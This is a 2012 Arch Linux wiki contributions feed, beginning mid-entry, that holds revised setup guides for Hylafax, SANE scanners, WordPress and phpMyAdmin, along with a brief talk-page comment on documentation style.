*[http://sherlock.heroku.com/blog/2012/02/03/setting-up-postfix-to-use-gmail-as-an-smtp-relay-host-in-archlinux/ Use Gmail as an SMTP Relay]</div>Wakehttps://wiki.archlinux.org/index.php?title=Hylafax&diff=235017Hylafax2012-11-12T04:54:01Z<p>Wake: Add See also section (faxq page is missing). Change to systemd.</p>
<hr />
<div>[[Category:Telephony and Voice]]<br />
==Setup==<br />
<br />
# pacman -S hylafax<br />
<br />
It could be that you need a MTA installed like postfix<br />
<br />
* After installation please run {{ic|faxsetup}} as root. Answer the questions and modify to your needs.<br />
<br />
* Run {{ic|faxaddmodem}} as root. It asks you for the device, leave out the {{ic|/dev}} prefix; only enter eg. modem, ttyS0 or such things.<br />
<br />
* Answer the other questions, important ones could be the ringtones, max pages, permissions on files or your the name that should be shown.<br />
<br />
* After that you have to modify your inittab, add this line to it, where <enteryourdevice> = for example modem ttyS0 etc.<br />
<br />
f1:2345:respawn:/usr/lib/fax/faxgetty <enteryourdevice><br />
<br />
* {{ic|telinit q}}<br />
<br />
* To start the Hylafax daemon '''hfaxd''' at boot time, see [[Daemons#Starting_on_boot]]. To start manually, see [[Daemons#Starting_manually]].<br />
<br />
Your received faxes will be saved in {{ic|/var/spool/hylafax/rcvq/}} and deleted after 30 days. Your send faxes will be saved in {{ic|/var/spool/hylafax/sendq/}}<br />
<br />
==Hints and tips==<br />
<br />
===Pagesize===<br />
<br />
Hylafax defaults are made for North America settings. Pagesize of send faxes can be adjusted in /usr/lib/fax/pagesizes for A4 default setup please change the file to that:<br />
<br />
{{bc|<br />
---snip<br />
Japanese Legal JP-LEG 12141 17196 11200 15300 900 400<br />
#<br />
#default NA-LET 10200 13200 9240 12400 472 345<br />
default A4 9920 14030 9240 13200 472 345<br />
---snap<br />
}}<br />
<br />
===No dialtone error or if you are a laptop user===<br />
<br />
If you need a special number to get the Dialtone add this to:<br />
<br />
/var/spool/hylafax/etc/config.<yourdevicename><br />
<br />
Uncomment the {{ic|ModemDialCmd}} line, and change {{ic|ATDT%s}} to {{ic|ATDT<yournumber>%s}}<br />
<br />
===For laptop users it might be helpfull to deactivate the dialtone check===<br />
<br />
Uncomment the {{ic|ModemDialCmd}} line, and change {{ic|ATDT%s}} to {{ic|ATX3DT%s}}<br />
<br />
===Automatic fax printing===<br />
<br />
Add this to /var/spool/hylafax/bin/faxrcvd at the end<br />
<br />
/usr/bin/tiff2ps -a -h 11.1082 -w 7.8543 $FILE | /usr/bin/lpr -P <yourprintername><br />
<br />
This setup is for A4 pagesize, adjust -h and -w to your needs if you need an other size.<br />
<br />
===Disabling MTA actions===<br />
<br />
Normally hylafax uses a MTA to receive faxes, if you do not need that change, your<br />
{{ic|/var/spool/hylafax/bin/faxrcvd}}<br />
<br />
Change {{ic|1=NOTIFY_FAXMASTER=always}} to {{ic|never}}<br />
<br />
===Enable automatic printing of notifications===<br />
<br />
If you want notifications to be printed out and not mailed, change your {{ic|/var/spool/hylafax/bin/notify}}<br />
<br />
* Change {{ic|1=NOTIFY_FAXMASTER=never}} to {{ic|always}} and at the end of that file<br />
<br />
* Comment this line : {{bc|<nowiki>) || 2>&1 $SENDMAIL -f$FROMADDR -oi -t</nowiki>}}<br />
<br />
* Add this as next line: {{bc|<nowiki>) || 2>&1 lpr -P <yourprinter> -p</nowiki>}}<br />
<br />
Remember to add your changed file to pacmans NoUpgrade list else your changes might get lost on update.<br />
<br />
===Useful commands===<br />
<br />
{{bc|<br />
faxstat (shows you the status of hylafax)<br />
faxstat -s (shows you the send status)<br />
faxstat -r (shows received faxes)<br />
faxalter -a now <jobid> (forces send retry now)<br />
faxrm <jobid> (deletes fax from sendqueue)<br />
}}<br />
<br />
For more options please read the manpages of each program<br />
<br />
==Apps for hylafax==<br />
<br />
GNU/Linux Apps:<br />
<br />
* kfax is a nice app to view the received tiff files.<br />
* KDE has a printer to send your document to fax, change it to use the hylafax backend.<br />
<br />
Windows Apps:<br />
<br />
* WFHC is a nice hylafax client for windows. Get it here: http://www.uli-eckhardt.de/whfc/<br />
* SuSEfax is also a nice client for windows. Get it here: ftp://ftp.suse.com/pub/suse/discontinued/i386/SuSEFax_WIN32<br />
<br />
==See also==<br />
[[faxq]] - HylaFAX queue manager process.<br />
{{ic|man hfaxd}}.<br />
<!-- vim: set ft=Wikipedia: --></div>Wakehttps://wiki.archlinux.org/index.php?title=User_talk:Arvid&diff=234766User talk:Arvid2012-11-10T22:18:33Z<p>Wake: Created page with "Re: replacing rc.d with systemd. The Help:Style#Daemon_operations, we sholdn't be showing explicit code in all the docs. I suppose that's to avoid future documentation pro..."</p>
<hr />
<div>Re: replacing rc.d with systemd. The [[Help:Style#Daemon_operations]], we sholdn't be showing explicit code in all the docs. I suppose that's to avoid future documentation problems, just like we have now with the systemd switchover. [[User:Wake|Wake]] ([[User talk:Wake|talk]]) 22:18, 10 November 2012 (UTC)</div>Wakehttps://wiki.archlinux.org/index.php?title=SANE&diff=234761SANE2012-11-10T22:00:23Z<p>Wake: /* Sharing Your Scanner Over a Network */ rm code.</p>
<hr />
<div>[[Category:Imaging]]<br />
[[es:Sane]]<br />
[[fr:Sane]]<br />
[[zh-CN:Sane]]<br />
{{Article summary start|Summary}}<br />
{{Article summary text|Installing and configuring Sane}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Scan print and save Script}}<br />
{{Article summary end}}<br />
<br />
Sane provides a library and a command-line tool to use scanners under GNU/Linux.<br />
[http://www.sane-project.org/sane-supported-devices.html Here] you can check if sane supports your scanner.<br />
<br />
== Installation ==<br />
{{Ic|sane}} is available in the {{Ic|[extra]}} repository so:<br />
# pacman -S sane<br />
<br />
== Configuration ==<br />
Now you can try to see if sane recognizes your scanner<br />
$ scanimage -L<br />
If that fails, check that your scanner is plugged into the computer. You also might have to unplug/plug your scanner for {{ic|/etc/udev/rules.d/sane.rules}} to recognize your scanner.<br />
<br />
Now you can see if it actually works<br />
$ scanimage --format=tiff > test.tiff<br />
<br />
=== For HP hardware ===<br />
For HP hardware you may also need to install the {{Ic|hplip}} and/or {{Ic|hpoj}} packages which are in the {{Ic|extra}} repository:<br />
# pacman -S hplip hpoj<br />
<br />
* Uncomment or add {{Ic|hpaio}} and {{Ic|hpoj}} to a new line in {{ic|/etc/sane.d/dll.conf}}.<br />
* Running {{Ic|hp-setup}} as root may help you add your device.<br />
* {{Ic|hp-plugin}} is the 'HPLIP Plugin Download and Install Utility'.<br />
* {{Ic|hp-scan}} is the 'HPLIP Scan Utility'.<br />
For Hewlett-Packard OfficeJet, PSC, LaserJet, and PhotoSmart printer multi-function peripherals, run ptal-init setup as root and follow instructions:<br />
ptal-init setup<br />
Then add ptal-init to the daemons line of /etc/rc.conf or run {{ic|ptal-init start}}, as root, to enable the daemon after reboot.<br />
<br />
=== For Brother hardware ===<br />
In order to install a Brother Scanner or Printer/Scanner Combo you need the right driver (which can be found in the AUR).<br />
There are only four drivers to choose from (brscan1-4). In order to find the right one you should search for your model at the [http://welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_scn.html brother linux scanner page].<br />
<br />
After you installed the driver you need to run<br />
# /usr/local/Brother/sane/setupSaneScan1 -i<br />
<br />
so the drivers/scanner are recognized by sane.<br />
<br />
For network scanners, Brother provides a configuration tool:<br />
$ brsaneconfig2 -a name=<ScannerName> model=<ScannerModel> ip=<ScannerIP><br />
Example:<br />
$ brsaneconfig2 -a name=SCANNER_DCP770CW model=DCP-770CW ip=192.168.0.110<br />
<br />
=== For Epson hardware ===<br />
For Wi-Fi and/or network scanners, you can use "Image Scan! for Linux".<br />
<br />
Install {{AUR|iscan}} and {{AUR|iscan-plugin-network}} from the [[AUR]], then update {{ic|/etc/sane.d/epkowa.conf}} and add the line:<br />
net {IP_OF_SCANNER}<br />
<br />
=== For Samsung hardware ===<br />
For some Samsung MFP printers you may need to edit /etc/sane.d/xerox_mfp.conf.<br />
<br />
example entry:<br />
#Samsung SCX-3200<br />
usb 0x04e8 0x3441<br />
<br />
Change the printer model as needed. You can get the ipVendor and idProduct code with lsusb. See [https://bbs.archlinux.org/viewtopic.php?id=123934 this thread].<br />
<br />
=== For plustek scanners ===<br />
Some plustek scanners (noticeably Canoscan ones), require a lock directory. Make sure that /var/lock/sane directory exists, that its permissions are 660, and that it is owned by <user>:scanner. If the directory permissions are wrong, only root will be able to use the scanner. Seems (at least on x86-64) that some programs using libusb (noticeably xsane and kooka) need scanner group rw permissions also for accessing /proc/bus/usb to work for a normal user.<br />
<br />
==Firmware==<br />
{{Note|This section is only needed if you need to upload firmware to your scanner.}}<br />
<br />
Firmwares usually have the '''{{Ic|.bin}}''' extension. <br />
<br />
Firstly you need to put the firmware someplace safe, it is recommended to put it in a subdirectory of {{ic|/usr/share/sane}}.<br />
<br />
Then you need to tell sane where the firmware is:<br />
*Find the name of the backend for your scanner from the [http://www.sane-project.org/sane-supported-devices.html sane supported devices list].<br />
*Open the file {{ic|/etc/sane.d/<backend-name>.conf}}.<br />
*Make sure the firmware entry is uncommented and let the file-path point to where you put the firmware file for your scanner. Be sure that members of the group {{Ic|scanner}} can access the {{ic|/etc/sane.d/<backend-name>.conf}} file.<br />
<br />
If the backend of your scanner is not part of the sane package (such as hpaio.conf which is part of hplip), you need to uncomment the relevant entry in /etc/sane.d/dll.d/hplip.<br />
<br />
==Install a frontend==<br />
XSane provides a GTK-based frontend to Sane. It is available in the {{Ic|extra}} repository.<br />
# pacman -S xsane<br />
{{Note|Scanning directly to pdf using Xsane in 16bit color depth mode is known to produces [https://bugs.launchpad.net/ubuntu/+source/xsane/+bug/539162 corrupted files]. 8bit mode should work.}}<br />
<br />
Other frontends exist, to find them you can:<br />
*use {{Ic|pacman -Ss}} to search for keywords such as "sane" or "scanner"<br />
*see the [http://www.sane-project.org/sane-frontends.html list of frontends] on the sane-project website<br />
<br />
==Network scanning==<br />
==== Sharing Your Scanner Over a Network ====<br />
<br />
You can share your scanner with other hosts on your network who use sane, xsane or xsane-enabled Gimp. To set up the server, first indicate which hosts on your network are allowed access.<br />
<br />
Change the /etc/sane.d/saned.conf file to your liking, for example:<br />
# required<br />
localhost<br />
# allow local subnet<br />
192.168.0.0/24<br />
<br />
Ensure xinetd is installed:<br />
# pacman -S xinetd<br />
<br />
Next, make sure the a file called /etc/xinetd.d/sane exists and disabled is set to no:<br />
service sane-port<br />
{<br />
port = 6566<br />
socket_type = stream<br />
wait = no<br />
user = root<br />
group = scanner<br />
server = /usr/sbin/saned<br />
disable = no<br />
}<br />
<br />
Add the following line to /etc/services:<br />
sane-port 6566/tcp<br />
<br />
[[Daemons#Starting_manually|Start]] xinetd.<br />
<br />
Your scanner can now be used by other workstations, across your local area network.<br />
<br />
To start xinetd at boot time, see [[Daemons#Starting_on_boot|Daemons]].<br />
<br />
==== Accessing Your Scanner from a Remote Workstation ====<br />
You can access your network-enabled scanner from a remote Arch Linux workstation.<br />
<br />
To set up your workstation, begin by installing xsane:<br />
# pacman -S xsane<br />
<br />
Next, specify the server's host name or IP address in the /etc/sane.d/net.conf file:<br />
# static IP address<br />
192.168.0.1<br />
# or host name<br />
stratus<br />
<br />
Now test your workstation's connection, from a non-root login prompt:<br />
$ xsane<br />
<br />
or<br />
$ scanimage -L<br />
<br />
After a short while, xsane should find your remote scanner and present you with the usual windows, ready for network scanning delight!<br />
<br />
For HP All in one network printer/scanner/fax you need to configure it via:<br />
$ hp-setup <printer ip><br />
<br />
==Troubleshooting==<br />
===Invalid argument===<br />
If you get an "Invalid argument" error with xsane or another sane front-end, this could be caused by one of the following reasons:<br />
<br />
==== Missing firmware file ====<br />
No firmware file was provided for the used scanner (see above for details).<br />
<br />
==== Wrong firmware file permissions ====<br />
The permissions for the used firmware file are wrong. Correct them using<br />
# chown root:scanner /usr/share/sane/SCANNER_MODEL/FIRMWARE_FILE<br />
# chmod ug+r /usr/share/sane/SCANNER_MODEL/FIRMWARE_FILE<br />
<br />
==== Multiple backends claim scanner ====<br />
It may happen, that multiple backends support (or pretend to support) your scanner, and sane chooses one that doesn't do after all (the scanner won't be displayed by scanimage -L then). This has happend with older Epson scanners and the <code>epson2</code> resp. <code>epson</code> backends. In this case, the solution is to comment out the unwanted backend in <code>/etc/sane.d/dll.conf</code>. In the Epson case, that would be to change<br />
<br />
epson2<br />
#epson<br />
<br />
to <br />
<br />
#epson2<br />
epson<br />
<br />
===Slow startup===<br />
If you encounter slow startup issue (e.g. xsane or scanimage -L take a lot to find scanner) it may be that more than one driver supporting it is available. <br />
<br />
Have a look at /etc/sane.d/dll.conf and try commenting out one (e.g. you may have epson, epson2 and epkowa enabled at the same time, try leaving only epson or epkowa uncommented)<br />
<br />
===Permission problem===<br />
If you see your scanner only when doing {{Ic|sudo lsusb}} you might get it working by adding your user to {{Ic|scanner}} and/or {{Ic|lp}} group.<br />
# gpasswd -a username scanner<br />
# gpasswd -a username lp<br />
This is reported to work on HP all-in-one models (e.g., PSC 1315 and PSC 2355).<br />
<br />
'''Also you could try to change permission of usb device''' but this is not recommended, a better solution is to fix the Udev rules so that your scanner is recognized.<br />
<br />
Example:<br />
<br />
First, switch to root and check connected usb devices with command 'lsusb'<br />
<br />
#[root@archlinux ~]# lsusb <br />
#Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 003 Device 003: ID 04d9:1603 Holtek Semiconductor, Inc. <br />
#Bus 003 Device 002: ID 04fc:0538 Sunplus Technology Co., Ltd <br />
#Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub<br />
#Bus 001 Device 006: ID 03f0:2504 Hewlett-Packard <br />
#Bus 001 Device 002: ID 046d:0802 Logitech, Inc. Webcam C200<br />
#Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub<br />
#[root@archlinux ~]# <br />
<br />
In our example we see scanner - ''''Bus 001 Device 006: ID 03f0:2504 Hewlett-Packard''''<br />
<br />
Now edit the file vi /lib/udev/rules.d/53-sane.rules and look for the first part of the ID number found previously and check if there is a line that also reports the second part of the number (model numer), in this example 2504. If not found change or copy a line and enter the idVendor and idProduct of your scanner, in this example it would be:<br />
<br />
# Hewlett-Packard ScanJet 4100C<br />
ATTRS{idVendor}=="03f0", ATTRS{idProduct}=="2504", MODE="0664", GROUP="scanner",<br />
ENV{libsane_matched}="yes"<br />
<br />
Save the file, plug out and back in your scanner and the file permissions should be now correct.<br />
<br />
Another tip, is that you can add your device (scanner) in backend file:<br />
<br />
In example we add string ''''usb 0x03f0 0x2504'''' to file ''''/etc/sane.d/hp4200.conf''''<br />
<br />
Now file looks like this:<br />
<br />
$ cat /etc/sane.d/hp4200.conf<br />
#<br />
# Configuration file for the hp4200 backend<br />
#<br />
#<br />
# HP4200<br />
#usb 0x03f0 0x0105<br />
usb 0x03f0 0x2504<br />
<br />
===DBus problem===<br />
If you get following problem:<br />
arguments to dbus_connection_send() were incorrect, assertion "connection != NULL" failed in file dbus-connection.c<br />
<br />
Make sure the {{Ic|dbus}} user is in the groups {{Ic|lp}} and {{Ic|scanner}}:<br />
$ groups dbus<br />
dbus<br />
# gpasswd -a dbus lp<br />
# gpasswd -a dbus scanner<br />
<br />
(Note that dbus must be stopped and started for the group changes take effect.)<br />
<br />
Make sure the system dbus is running:<br />
$ rc.d list dbus<br />
[STARTED]&#91;[[rc.conf#Daemons|AUTO]]&#93; dbus<br />
<br />
If it isn't, start it with:<br />
# rc.d start dbus<br />
<br />
A session dbus alone seems to be insufficient for scanner operation.<br />
===Epson Perfection 1270===<br />
<br />
For Epson Perfection 1270, you also need a firmware named esfw3e.bin, you can get it from (anyone could give a working place so I can upload it?), or you can get it yourself by reference to [http://wiki.archlinux.org/index.php/Scanner_setup_%26_configure Scanner setup & configure]. I get it by installing the driver in the windows.<br />
<br />
Modify configuration file of snapscan backend:<br />
<br />
vi /etc/sane.d/snapscan.conf <br />
<br />
Change the firmware path line with yours. :<br />
<br />
<pre><br />
# Change to the fully qualified filename of your firmware file, if<br />
# firmware upload is needed by the scanner<br />
firmware /mnt/mydata/Backups/firmware/esfw3e.bin<br />
</pre><br />
<br />
And add the following line in the end or anywhere you like<br />
<br />
<pre><br />
# Epson Perfection 1270<br />
usb 0x04b8 0x0120<br />
</pre><br />
<br />
You can get such code information (''usb 0x04b8 0x0120'') by "sane-find-scanner" command.<br />
<br />
Also add such information lines in your libsane.usermap file to setup your privilage, like:<br />
<br />
vi /etc/hotplug/usb/libsane.usermap<br />
<br />
#Epson Perfection 1270<br />
libusbscanner 0x0003 0x04b8 0x0120 0x0000 0x0000 0x00 0x00 0x00 0x00 0x00 0x00 0x00000000<br />
<br />
Replug scanner, you have a working Epson Perfection 1270 now.<br />
<br />
NOTE: I can scan image if I define the X and Y value, but without that error meassage occors like: "scanimage: sane_start: Error during device I/O", if anyone know why, please complete the section.<br />
".</div>Wakehttps://wiki.archlinux.org/index.php?title=Wordpress&diff=234759Wordpress2012-11-10T21:54:35Z<p>Wake: /* Configure apache */ rm code</p>
<hr />
<div>[[Category:Web Server]]<br />
{{Article summary start}}<br />
{{Article summary text|Wordpress is an easy to setup and administer FLOSS content management system featuring a strong and vibrant community with thousands of plugins and themes.}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|LAMP}}<br />
{{Article summary wiki|PHP}}<br />
{{Article summary wiki|MySQL}}<br />
{{Article summary wiki|phpMyAdmin}}<br />
{{Article summary end}}<br />
<br />
[http://wordpress.org Wordpress] is the goto Free Libre Open Source Software ([[Wikipedia:Free and open-source software|FLOSS]]) content management system ([[Wikipedia:Content management system|CMS]]) created by [[Wikipedia:Matt Mullenweg|Matt Mullenweg]] and first released in 2003. Wordpress has a vast and vibrant community that provides tens of thousands of free plugins and themes to allow the user to easily customize the appearance and function of their Wordpress CMS. Wordpress is licensed under the GPLv2.<br />
<br />
The biggest feature of Wordpress is its ease in configuration and administration. [http://codex.wordpress.org/Installing_WordPress Setting up a Wordpress site takes five minutes]. The Wordpress administration panel allows users to easily configure almost every aspect of their website including fetching and installing plugins and themes. Wordpress provides effortless automatic updates.<br />
<br />
== Installation ==<br />
<br />
Wordpress also requires [[PHP]] and [[MySQL]] to be installed and configured. See the [[LAMP]] wiki article for more information.<br />
<br />
{{note|As of August 2012, this article does not support using Wordpress with PostrgreSQL. Wordpress was designed to be used with mysql only. It is possible to use Wordpress with other databases such as PostgreSQL, through the use of a [http://wordpress.org/extend/plugins/postgresql-for-wordpress/ plugin] and a bit of work.}}<br />
<br />
=== Installation using pacman ===<br />
<br />
[[pacman|Install]] {{pkg|wordpress}} from the [[official repositories]].<br />
<br />
{{warning|While it is easier to let pacman manage updating your Wordpress install, this is not necessary. Wordpress has functinality built-in for managing updates, themes, and plugins. If you decide to install the official community package, you will not be able to install plugins and themes using the Wordpress admin panel without a needlessly complex permissions setup, or logging into FTP as root. pacman does not delete the Wordpress install directory when uninstalling it from your system regardless of whether or not you have added data to the directory manually or otherwise.}}<br />
<br />
=== Manual install ===<br />
<br />
Go to [http://wordpress.org/download/ wordpress.org] and download the latest version of Wordpress and extract it to your webserver directory. Give the directory enough permissions to allow your FTP user to write to the directory (used by Wordpress).<br />
<br />
cd /srv/http/whatever<br />
wget https://wordpress.org/latest.tar.gz<br />
tar xvvf latest.tar.gz<br />
<br />
== Configuration ==<br />
<br />
The configuration method used here assumes you are using Wordpress on a local network.<br />
<br />
=== Host config ===<br />
<br />
Make sure your {{ic|/etc/hosts}} file is setup correctly. This will be important when accessing your Wordpress CMS from a local network. Your {{ic|/etc/hosts}} file should look something like the following,<br />
<br />
{{bc|#<ip-address> <hostname.domain.org> <hostname><br />
127.0.0.1 lithium.kaboodle.net localhost lithium<br />
::1 lithium.kaboodle.net localhost lithium}}<br />
<br />
{{note|You will need to use a proxy server to access your Wordpress installation from mobile devices if you plan on using hostnames to install Wordpress, otherwise your website will appear broken [[#Appearance is broken (no styling)]].}}<br />
<br />
=== Configure apache ===<br />
<br />
You will need to create a config file for apache to find your Wordpress install. Create the following file and edit it your favorite text editor:<br />
<br />
{{hc|# /etc/httpd/conf/extra/httpd-wordpress.conf|<br />
Alias /wordpress "/usr/share/webapps/wordpress"<br />
<Directory "/usr/share/webapps/wordpress"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:$"<br />
</Directory>}}<br />
<br />
Change {{ic|/wordpress}} in the first line to whatever you want. For example, {{ic|/myblog}} would require that you navigate to {{ic|http://hostname/myblog}} to see your Wordpress website.<br />
<br />
Also change the paths to your Wordpress install folder in case you did a manual install. Don't forget to append the parent directory to the {{ic|php_admin_value}} variable as well as shown below.<br />
<br />
{{hc|# /etc/httpd/conf/extra/httpd-wordpress.conf|<br />
Alias /myblog "/mnt/data/srv/wordpress"<br />
<Directory "/mnt/data/srv/wordpress"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/mnt/data/srv:$"<br />
</Directory>}}<br />
<br />
Next edit the apache config file and add the following:<br />
<br />
{{hc|# /etc/httpd/conf/httpd.conf|<br />
...<br />
Include conf/extra/httpd-wordpress.conf<br />
...<br />
}}<br />
<br />
Now [[Daemons#Restarting|restart]] httpd (Apache).<br />
<br />
=== Configure MySQL ===<br />
<br />
MySQL can be configured using a plethora of tools, but the most common are the command line or [http://www.phpmyadmin.net/home_page/index.php phpMyAdmin].<br />
<br />
==== Using phpMyAdmin ====<br />
<br />
See [[phpMyAdmin]] to install and configure phpMyAdmin.<br />
<br />
In your web browser, navigate to your phpMyAdmin host and perform the following<br />
steps:<br />
<br />
# Login to phpMyAdmin.<br />
# Click "user" and then click "Add user".<br />
# Give the pop up window a name and a password.<br />
# Select "Create database with same name and grant all privileges".<br />
# Click the "Add user" button to create the user.<br />
<br />
== Wordpress Installation ==<br />
<br />
Once you have spent a couple of hours setting up your http server, php, and mysql, it is finally time to let Wordpress have its five minutes and install itself. So let us begin.<br />
<br />
The Wordpress installation procedure will use the URL in the address field of your web browser as the default website URL. If you have navigated to http://localhost/wordpress, your website will be accessible from your local network, but it will be broken in appearance and function.<br />
<br />
# Navigate to {{ic|http://hostname/wordpress}}.<br />
# Click the "Create a Configuration File" button.<br />
# Click the "Let's go!" button.<br />
# Fill in you database information created in the previous section<br />
# Click "Submit".<br />
<br />
If you installed Wordpress from the Official repository, then this setup procedure will not have the correct permissions to create the wp-config.php file used by Wordpress. You will have to do this step yourself as root using information Wordpress will provide.<br />
<br />
A page will appear saying Wordpress can not write the wp-config.php file. Copy the text in the edit box and open {{ic|/usr/share/webapps/wordpress/wp-config.php}} as root in your text editor. Paste the copied text into the editor and save the file.<br />
<br />
Finally, Click "Run the install" and Wordpress will populate the database with your information. Once complete, you will be shown "Success!" page. Click the login button to finish your installation.<br />
<br />
Now would be a good time to access your website from all your devices to be sure your Wordpress installation is setup correctly.<br />
<br />
== Usage ==<br />
<br />
=== Installing a theme ===<br />
<br />
There are tens of thousands of themes available for Wordpress. Searching on google for a good theme can be like wading through a river filled with trash. Good places for looking for themes include [http://www.smashingmagazine.com/ Smashing Magazine] and the [http://wordpress.org/extend/themes/ official Wordpress theme website]. There is also pay for theme sites like [http://www.woothemes.com/ Woo Themes] and [http://thethemefoundry.com/ The Theme Factory].<br />
<br />
==== Using the admin panel ====<br />
<br />
Before installing a theme using the admin panel, you will need to setup an [https://wiki.archlinux.org/index.php/Very_Secure_FTP_Daemon FTP] server on your Wordpress host.<br />
<br />
Once the FTP server is setup, login to your Wordpress installation and click <nowiki>"Appearance->Install Themes->Upload"</nowiki>. From there select your zip file that contains your theme and click "Install Now". You will be presented with a box asking for FTP information, enter it and click "Proceed". If you have been following along closely, you should now have an installed theme. Activate it if you wish.<br />
<br />
=== Installing a plugin ===<br />
<br />
The steps for installing a plugin are the same as they are for installing a theme. Just click the "Plugins" link in the left navigation bar and follow the steps. Wordpress is very easy to use.<br />
<br />
=== Updating ===<br />
<br />
Every now and then when you log into wordpress there will be a notification informing you of updates. If you have correctly installed and configured an FTP client, and have the correct filesystem permissions to write in the Wordpress install path then you should be able to perform updates at the click of a button. Just follow the steps.<br />
<br />
== Troubleshooting ==<br />
<br />
=== Appearance is broken (no styling) ===<br />
<br />
Your Wordpress website will appear to have no styling to it when viewing it in a web browser (desktop or mobile) that does not have its hostnames mapped to ip addresses correctly.<br />
<br />
This occurs because you used a url with the hostname of your server, instead of an ip address, when doing the initial setup and Wordpress has used this as the default website URL.<br />
<br />
To fix this, you will either need to edit your /etc/hosts file or setup a proxy server. For an easy to setup proxy server, see [[Polipo]], or if you want something with a little more configuration, see [[Squid]].<br />
<br />
== Tips and tricks ==<br />
<br />
== See also ==<br />
* [[Wikipedia:WordPress|Wordpress]]<br />
* [[Wikipedia:Content management system|Content management system]]</div>Wakehttps://wiki.archlinux.org/index.php?title=PhpMyAdmin&diff=234758PhpMyAdmin2012-11-10T21:50:32Z<p>Wake: /* Accessing your phpMyAdmin installation */ rm rc.d stuff, and sudo</p>
<hr />
<div>[[Category:Web Server]]<br />
{{lowercase title}}<br />
[[cs:PhpMyAdmin]]<br />
[[es:PhpMyAdmin]]<br />
[[fr:phpmyadmin]]<br />
[[ru:PhpMyAdmin]]<br />
[[tr:PhpMyAdmin]]<br />
[[zh-CN:PhpMyAdmin]]<br />
==Pre-Installation==<br />
See [[LAMP]] for a guide to setting up Apache, MySQL, and PHP.<br />
<br />
==Installation==<br />
To install [http://www.phpmyadmin.net/ phpMyAdmin], install the ''phpmyadmin'' and ''php-mcrypt'' packages with<br />
{{bc|<br />
pacman -S phpmyadmin php-mcrypt<br />
}}<br />
<br />
== Configuration ==<br />
Ensure you do not have an older copy of phpMyAdmin.<br />
{{bc|<br />
rm -r /srv/http/phpMyAdmin<br />
}}<br />
<br />
Copy the example configuration file to your httpd configuration directory.<br />
{{bc|<br />
cp /etc/webapps/phpmyadmin/apache.example.conf /etc/httpd/conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# phpMyAdmin configuration<br />
Include conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
You can type this into the terminal to produce the same effect:<br />
{{bc|<br />
echo -e "\nInclude conf/extra/httpd-phpmyadmin.conf" >> /etc/httpd/conf/httpd.conf<br />
}}<br />
<br />
=== Enable php handling in Apache ===<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# Use for PHP 5.x:<br />
LoadModule php5_module modules/libphp5.so<br />
AddHandler php5-script php<br />
}}<br />
<br />
Add index.php after "DirectoryIndex index.html"<br />
{{bc|<br />
# DirectoryIndex: sets the file that Apache will serve if a directory<br />
# is requested.<br />
#<br />
<IfModule dir_module><br />
DirectoryIndex index.html index.php<br />
</IfModule><br />
}}<br />
<br />
=== Adjust access rights ===<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/.htaccess}}, comment out ''deny from all''. The line should look like this:<br />
#deny from all<br />
<br />
Alternatively, you can restrict access to localhost and your local network only. Replace ''192.168.1.0/24'' with your network's IP block.<br />
deny from all<br />
allow from localhost<br />
allow from 192.168.1.0/24<br />
<br />
The lines above are not enough if you use ipv6 in {{ic|/etc/hosts}}. If so, add one more line to {{ic|/etc/webapps/phpmyadmin/.htaccess}}:<br />
allow from ::1<br />
<br />
Otherwise you'll get an error similar to "Error 403 - Access forbidden!" when you attempt to access your phpMyAdmin installation.<br />
<br />
=== Review apache phpmyadmin configuration ===<br />
<br />
Your {{ic|/etc/httpd/conf/extra/httpd-phpmyadmin.conf}} should have the following information:<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
<Directory "/usr/share/webapps/phpMyAdmin"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/"<br />
</Directory><br />
}}<br />
<br />
You need the mcrypt (if you want phpmyadmin internal authentication) and mysql modules, so uncomment the following in {{ic|/etc/php/php.ini}}:<br />
extension=mcrypt.so<br />
extension=mysql.so<br />
extension=mysqli.so (optional)<br />
<br />
and [[Daemons#Restarting|restart]] httpd (Apache).<br />
<br />
=== Add blowfish_secret passphrase ===<br />
If you see the following error message at the bottom of the page when you first log in to /phpmyadmin (using a previously setup MySQL username and password) :<br />
<br />
ERROR: The configuration file now needs a secret passphrase (blowfish_secret)<br />
<br />
You need to add a blowfish password to the phpMyAdmin's config file. Edit {{ic|/etc/webapps/phpmyadmin/config.inc.php}} and insert a random blowfish "password" in the line <br />
<br />
$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
Go [http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator here] to get a nicely generated blowfish_secret and paste it between the '' marks. It should now look something like this:<br />
<br />
$cfg['blowfish_secret'] = 'qtdRoGmbc9{8IZr323xYcSN]0s)r$9b_JUnb{~Xz'; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
The error should go away if you refresh the phpmyadmin page.<br />
<br />
=== Enabling Configuration Storage (optional) ===<br />
